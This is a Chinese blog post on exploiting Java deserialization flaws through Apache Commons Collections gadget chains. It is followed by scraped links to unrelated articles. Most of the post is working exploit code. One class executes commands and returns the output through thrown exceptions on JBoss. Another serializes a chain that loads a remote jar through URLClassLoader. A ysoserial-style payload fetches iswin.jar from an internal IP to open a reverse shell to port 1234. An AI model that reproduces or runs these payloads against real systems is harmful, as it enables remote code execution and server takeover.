• 使用java.net.URLClassLoader类,远程加载自定义类(放在自己服务器上的jar包),可以自定义方法执行。

• 在自定义类中,抛出异常,使其成功随着Jboss报错返回命令执行结果。

首先得通过代码执行将ErrorBaseExec写到服务器上。

package me.lightless.shiro;

import java.io.BufferedReader;

import java.io.InputStreamReader;

public class ErrorBaseExec {

    public static void do_exec(String args) throws Exception

    {

        Process proc = Runtime.getRuntime().exec(args);

        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));

        StringBuffer sb = new StringBuffer();

        String line;

        while ((line = br.readLine()) != null)

        {

            sb.append(line).append("\n");

        }

        String result = sb.toString();

        Exception e=new Exception(result);

        throw e;

    }

}

第二步本地将ErrorBaseExec打jar包,并把jar包放到服务器上

javac ErrorBaseExec.java //先编译成class文件

jar -cvf ErrorBaseExec.jar ErrorBaseExec.class //打成jar包

运行如下代码:

package me.lightless.shiro;

import org.apache.commons.collections.Transformer;

import org.apache.commons.collections.functors.ChainedTransformer;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.keyvalue.TiedMapEntry;

import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;

import java.io.*;

import java.lang.reflect.Field;

import java.net.MalformedURLException;

import java.util.HashMap;

import java.util.Map;

public class Test {

    public static void main(String[] args) throws IllegalAccessException, IOException, NoSuchFieldException, ClassNotFoundException {

        Transformer[] transformers = new Transformer[0];

        try {

            transformers = new Transformer[] {

                    new ConstantTransformer(java.net.URLClassLoader.class),

                    new InvokerTransformer(

                            "getConstructor",

                            new Class[] {Class[].class},

                            new Object[] {new Class[]{java.net.URL[].class}}

                    ),

                    new InvokerTransformer(

                            "newInstance",

                            new Class[] {Object[].class},

                            new Object[] { new Object[] { new java.net.URL[] { new java.net.URL("http://127.0.0.1/ErrorBaseExec.jar") }}}

                    ),

                    new InvokerTransformer(

                            "loadClass",

                            new Class[] { String.class },

                            new Object[] { "me.lightless.shiro.ErrorBaseExec" }

                    ),

                    new InvokerTransformer(

                            "getMethod",

                            new Class[]{String.class, Class[].class},

                            new Object[]{"do_exec", new Class[]{String.class}}

                    ),

                    new InvokerTransformer(

                            "invoke",

                            new Class[]{Object.class, Object[].class},

                            new Object[]{null, new String[]{"whoami"}}

                    )

            };

        } catch (MalformedURLException e) {

            e.printStackTrace();

        }

   /*

        URLClassLoader.class.getConstructor(java.net.URL[].class).

                newInstance(new java.net.URL("url")).loadClass("remote_class").

                getMethod("do_exec", String.class).invoke(null, "cmd");

         */

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innerMap = new HashMap();

        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        //decorate实例化LazyMap类。

        // LazyMap類的get方法調用了transform,transform可以通過反射机制执行命令

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");  //TiedMapEntry中调用了toString方法->调用了map的get方法

        BadAttributeValueExpException poc = new BadAttributeValueExpException(null); //BadAttributeValueExpException的构造方法调用toString方法

//         val是私有变量,所以利用下面方法进行赋值,val变量赋值为TiedMapEntry的实例化对象,

//         重写了BadAttributeValueExpException的readObject方法的val变量赋值为BadAttributeValueExpException类,

//         就会调用BadAttributeValueExpException的val = valObj.toString();触发上面的

        Field valfield = poc.getClass().getDeclaredField("val");

//        System.out.println(valfield);

        valfield.setAccessible(true);

        valfield.set(poc, entry);

        File f = new File("poc.txt");

        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));

        out.writeObject(poc);

        out.close();

        //从文件中反序列化obj对象

        FileInputStream fis = new FileInputStream("poc.txt");

        ObjectInputStream ois = new ObjectInputStream(fis);

        //恢复对象

        ois.readObject();

        ois.close();

    }

}

通过异常,出现回显,在利用的时候,找一个pop gaget writeObject,传到服务器进行反序列化。



明显上面利用方式比较复杂,还需要将jar或者class文件上传到服务器,这时候我们可以利用defineClass加载byte[]返回Class对象,不用上传文件到服务器。

具体可以参考这篇文章:https://www.freebuf.com/articles/others-articles/167932.html

通过加载远程jar包反弹shell payload:

package ysoserial.payloads;

import java.io.*;

import java.lang.annotation.Retention;

import java.lang.reflect.Constructor;

import java.lang.reflect.Field;

import java.lang.reflect.InvocationHandler;

import java.lang.reflect.Proxy;

import java.util.HashMap;

import java.util.Map;

import org.apache.commons.collections.Transformer;

import org.apache.commons.collections.functors.ChainedTransformer;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.map.LazyMap;

public class CommonsCollectionsjar{

    public InvocationHandler getObject(final String ip) throws Exception {

        // inert chain for setup

        final Transformer transformerChain = new ChainedTransformer(

            new Transformer[] { new ConstantTransformer(1) });

        // real chain for after setup

        final Transformer[] transformers = new Transformer[] {

            new ConstantTransformer(java.net.URLClassLoader.class),

            // getConstructor class.class classname

            new InvokerTransformer("getConstructor",

                new Class[] { Class[].class },

                new Object[] { new Class[] { java.net.URL[].class } }),

            // newinstance string http://www.iswin.org/attach/iswin.jar

            new InvokerTransformer(

                "newInstance",

                new Class[] { Object[].class },

                new Object[] { new Object[] { new java.net.URL[] { new java.net.URL(

                    "http://192.168.61.136/iswin.jar") } } }),

            // loadClass String.class R

            new InvokerTransformer("loadClass",

                new Class[] { String.class }, new Object[] { "R" }),

            // set the target reverse ip and port

            new InvokerTransformer("getConstructor",

                new Class[] { Class[].class },

                new Object[] { new Class[] { String.class } }),

            // invoke

            new InvokerTransformer("newInstance",

                new Class[] { Object[].class },

                new Object[] { new String[] { ip } }),

            new ConstantTransformer(1) };

        final Map innerMap = new HashMap();

        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        //this will generate a AnnotationInvocationHandler(Override.class,lazymap) invocationhandler

        InvocationHandler invo = (InvocationHandler) getFirstCtor(

            "sun.reflect.annotation.AnnotationInvocationHandler")

            .newInstance(Retention.class, lazyMap);

        //generate object which implements specifiy interface

        final Map mapProxy = Map.class.cast(Proxy.newProxyInstance(this

            .getClass().getClassLoader(), new Class[] { Map.class }, invo));

        final InvocationHandler handler = (InvocationHandler) getFirstCtor(

            "sun.reflect.annotation.AnnotationInvocationHandler")

            .newInstance(Retention.class, mapProxy);

        setFieldValue(transformerChain, "iTransformers", transformers);

        return handler;

    }

    public static Constructor<?> getFirstCtor(final String name)

        throws Exception {

        final Constructor<?> ctor = Class.forName(name)

            .getDeclaredConstructors()[0];

        ctor.setAccessible(true);

        return ctor;

    }

    public static Field getField(final Class<?> clazz, final String fieldName)

        throws Exception {

        Field field = clazz.getDeclaredField(fieldName);

        if (field == null && clazz.getSuperclass() != null) {

            field = getField(clazz.getSuperclass(), fieldName);

        }

        field.setAccessible(true);

        return field;

    }

    public static void setFieldValue(final Object obj, final String fieldName,

                                     final Object value) throws Exception {

        final Field field = getField(obj.getClass(), fieldName);

        field.set(obj, value);

    }

    public static void main(final String[] args) throws Exception {

        final Object objBefore = CommonsCollectionsjar.class.newInstance()

            .getObject("192.168.61.136:1234");

        //deserialize(serialize(objBefore));

        File f = new File("E:\\Struts2-Vulenv-master\\ysoserial\\src\\main\\java\\ysoserial\\payloads\\payloadsfinal.bin");

        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));

        out.writeObject(objBefore);

        out.flush();

        out.close();

        FileInputStream fis = new FileInputStream("E:\\Struts2-Vulenv-master\\ysoserial\\src\\main\\java\\ysoserial\\payloads\\payloadsfinal.bin");

        ObjectInputStream ois = new ObjectInputStream(fis);

        //恢复对象

        ois.readObject();

        ois.close();

    }

}

参考链接:

http://blog.nsfocus.net/java-deserialization-vulnerability-comments/

https://www.iswin.org/2015/11/13/Apache-CommonsCollections-Deserialized-Vulnerability/

反序列化报错回显、反弹shell的更多相关文章

  1. 解决使用Redis时配置 fastjson反序列化报错 com.alibaba.fastjson.JSONException: autoType is not support

    1.问题描述 在使用redis时,配置自定义序列化redisTemplate为FastJsonRedisSerializer .  1 /** 2 * 自定义redis序列化器 3 */ 4 @Sup ...

  2. C# UTF8的BOM导致XML序列化与反序列化报错:Data at the root level is invalid. Line 1, position 1.

    最近在写一个xml序列化及反序列化实现时碰到个问题,大致类似下面的代码: class Program { static void Main1(string[] args) { var test = n ...

  3. Spring Data JPA整合REST客户端Feign时: 分页查询的反序列化报错的问题

    Type definition error: [simple type, class org.springframework.data.domain.Page]; nested exception i ...

  4. jackson反序列化报错Unrecognized field , not marked as ignorable

    使用Jackson提供的json注解. @JsonIgnore注解用来忽略某些字段,可以用在Field或者Getter方法上,用在Setter方法时,和Filed效果一样.这个注解只能用在POJO存在 ...

  5. 使用Redis 配置替换fastjson 反序列化报错 com.alibaba.fastjson.JSONException: autoType is not support

    新建的GenericFastJson2JsonRedisSerializer里面添加白名 添加: static {        ParserConfig.getGlobalInstance().ad ...

  6. 十六:SQL注入之查询方式及报错盲注

    在很多注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL查询语句有问题,这时候我们需要用到相关的报错或者盲注进行后续操作,同时作为手工注入的时候,需要提前了解SQL语句能更好的选择对应 ...

  7. sql注入之查询方式及报错注入

    当进行sql注入时,有很多注入会出无回显的情况,其中不回显的原因可能是sql语句查询方式的问题导致的,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知器sqkl语句 ...

  8. shell 报错:syntax error: unexpected end of file

    有时执行脚本时会报错: [root@host1 shell]# sh -x test.sh + $'\r' : command not found test.: syntax error: unexp ...

  9. 关于Flutter启动项目白屏,报错[ERROR:flutter/shell/gpu/gpu_surface_gl.cc(58)] Failed to setup Skia Gr context.问题的解决方案

    首先,环境如下: 1.系统:windows10 64位   Android SDK version: 28.0.3   Flutter SDK: v1.5.4-hotfix.2   模拟器: 网易Mu ...

随机推荐

  1. OGG ERRORS 总结

    OGG ERRORS 总结 */--> OGG ERRORS 总结 Table of Contents 1. libnnz11.so 2. 00446 2.1. missing filename ...

  2. C++代码匈牙利命名规范

    一.类 除了异常类等个别情况(不希望用户把该类看作一个普通的.正常的类之情况)外,C++类/结构的命名应该遵循以下准则: C++类的命名    类的名称都要以大写字母“C”开头,后跟一个或多个单词.为 ...

  3. MySQL主从双向同步

    最近部署测试环境,涉及到MySQL数据库主从双向同步的部署,记录一下部署过程,正常读写都发生在主库,从库作为备选数据库(热备份),当主库发生异常,数据库自动切换到从库,这里面是怎么监控数据库异常并触发 ...

  4. NET全控件

    NBSI WebSite Injection ReportSite Address: www.xmht.comInject URL: http://www.xmht.com/news.aspx?sty ...

  5. TASK的开始与暂停

    namespace WpfApplication1 { /// <summary> /// MainWindow.xaml 的交互逻辑 /// </summary> publi ...

  6. panic 捕获及 throw 崩溃

    一,go 语言 panic 报错捕获  使用 go 语言的同学在真实项目中应该经常出现空指针使用等 panic 报错,这类报错与 C++ 中的 try-catch 模块不同,go 语言会一直将当前 p ...

  7. 使用checked和unchecked来对整数溢出进行检测和忽略

    在C#中,整数int32的取值为-2147483648~2147473647(可以通过int.MaxValue和int.MinValue获得)当超出这个范围后,编译器不会进行检查,仍然会进行运算,但得 ...

  8. 并查集 --以cogs259为例

    题目链接:http://cogs.pro:8081/cogs/problem/problem.php?pid=pySmxSVgP [问题描述]     或许你并不知道,你的某个朋友是你的亲戚.他可能是 ...

  9. hadoop(一HDFS)

    hadoop(一HDFS) 介绍 狭义上来说: hadoop指的是以下的三大系统: HDFS :分布式文件系统(高吞吐,没有延时要求,容错性,扩展能力) MapReduce : 分布式计算系统 Yar ...

  10. P1062 数列 题解

    (题目为啥要强调用十进制输出呢,明明就是故意提醒) 分析一下样例 k=3k=3时,数列为:1,3,4,9,10,12,13..1,3,4,9,10,12,13.. 转换成三进制就是:1,10,11,1 ...